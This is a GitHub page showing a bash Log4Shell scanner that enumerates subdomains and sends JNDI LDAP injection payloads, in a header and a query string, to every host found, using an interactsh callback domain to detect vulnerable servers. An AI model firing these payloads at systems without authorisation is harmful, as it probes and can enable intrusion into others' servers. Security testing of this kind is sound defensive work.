-
Notifications
You must be signed in to change notification settings - Fork 2
/
log4j_scanner.sh
144 lines (129 loc) · 7.83 KB
/
log4j_scanner.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
#! /bin/bash
# ________ ___ ___ ________ _____ ______ ________ ________
#|\ ____\|\ \|\ \|\ __ \|\ _ \ _ \|\ __ \|\ __ \
#\ \ \___|\ \ \\\ \ \ \|\ \ \ \\\__\ \ \ \ \|\ \ \ \|\ \
# \ \_____ \ \ __ \ \ __ \ \ \\|__| \ \ \ \\\ \ \ \\\ \
# \|____|\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\\ \ \ \\\ \
# ____\_\ \ \__\ \__\ \__\ \__\ \__\ \ \__\ \_______\ \_______\
# |\_________\|__|\|__|\|__|\|__|\|__| \|__|\|_______|\|_______|
# \|_________|
#
# github: https://github.com/shamo0
doesCommandExist() {
command -v "$1" >/dev/null 2>&1
if [[ $? -ne 0 ]]; then
echo -e "$(tput setaf 3)$1 $(tput sgr0)"
fi
}
domainScan-DoesCommandExistReqText() {
if [[ $(command -v "curl" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "httpx" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "assetfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "subfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "amass" >/dev/null 2>&1 ; echo $?) -ne 0 ]]; then
echo -e "\n$(tput setaf 3 ; tput rev ; tput bold) ! Warning ! $(tput sgr0)"
echo -e "$(tput setaf 3)Using this feature requires special requirements. It has been detected that the requirements are not installed on your system. $(tput sgr0)"
echo -e "\n$(tput setaf 3 ; tput bold)Please install these tools: $(tput sgr0)"
fi
}
domainScan-DoesCommandExistReqExit() {
if [[ $(command -v "curl" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "httpx" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "assetfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "subfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "amass" >/dev/null 2>&1 ; echo $?) -ne 0 ]]; then
exit
fi
}
listScan-DoesCommandExistReqText() {
if [[ $(command -v "curl" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "httpx" >/dev/null 2>&1 ; echo $?) -ne 0 ]]; then
echo -e "\n$(tput setaf 3 ; tput rev ; tput bold) ! Warning ! $(tput sgr0)"
echo -e "$(tput setaf 3)Using this feature requires special requirements. It has been detected that the requirements are not installed on your system. $(tput sgr0)"
echo -e "\n$(tput setaf 3 ; tput bold)Please install these tools: $(tput sgr0)"
fi
}
listScan-DoesCommandExistReqExit() {
if [[ $(command -v "curl" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "httpx" >/dev/null 2>&1 ; echo $?) -ne 0 ]]; then
exit
fi
}
doesCommandExistReqMoreInfo() {
if [[ $(command -v "curl" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "httpx" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "assetfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "subfinder" >/dev/null 2>&1 ; echo $?) -ne 0 || $(command -v "amass" >/dev/null 2>&1 ; echo $?) -ne 0 ]]; then
echo -e "$(tput setaf 4 ; tput bold)\n$(tput setaf 4 ; tput bold)More Info: $(tput smul)https://github.com/adilsoybali/Log4j-RCE-Scanner#requirements$(tput rmul) $(tput sgr0)\n"
fi
}
showHelp() {
cat << EOF
$(tput setaf 2)
Usage:
$0 -l subdomains.txt -i c6wvp482vtc10xx5bhnggdqp5neyyyyyb.interact.sh
$0 -d vulnsite.com -i c6wvp482vtc10xx5bhnggdqp5neyyyyyb.interact.sh
-h, --help Help menu
-l, --url-list List of domain/subdomain/ip to be used for scanning.
-d, --domain The domain name to which all subdomains and itself will be checked with Subfinder & Assetfinder.
-i, --inteactshdomain interactsh domain address.
$(tput sgr0)
EOF
}
domainScan() {
domainScan-DoesCommandExistReqText
for COMMAND in "curl" "httpx" "assetfinder" "subfinder" "amass"; do
doesCommandExist "${COMMAND}"
done
doesCommandExistReqMoreInfo
domainScan-DoesCommandExistReqExit
echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do
url_without_protocol=$(echo $url | sed 's|https://||g' | sed 's|http://||g')
url_without_protocol_and_port=$(echo $url_without_protocol | sed 's|:.*||g')
echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --insecure --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
listScan() {
listScan-DoesCommandExistReqText
for COMMAND in "curl" "httpx"; do
doesCommandExist "${COMMAND}"
done
doesCommandExistReqMoreInfo
listScan-DoesCommandExistReqExit
cat $list | sort -u | httpx -silent | while read url; do
url_without_protocol=$(echo $url | sed 's|https://||g' | sed 's|http://||g')
url_without_protocol_and_port=$(echo $url_without_protocol | sed 's|:.*||g')
echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
echo 'curl -s --insecure --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'base64)'|g" | sed "s|\$url|$url|g" | bash
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-l | --url-list )
list="$2"
if [[ "$3" == "-i" || "$3" == "--inteactshdomain" ]]; then
inteactshdomain="$4"
else
showHelp
exit
fi
listScan
exit
;;
-d | --domain )
domain="$2"
if [[ "$3" == "-i" || "$3" == "--inteactshdomain" ]]; then
inteactshdomain="$4"
else
showHelp
exit
fi
domainScan
exit
;;
*)
showHelp
exit
;;
esac; shift; done
if [[ "$1" == '--' ]]; then
shift
else
showHelp
exit
fi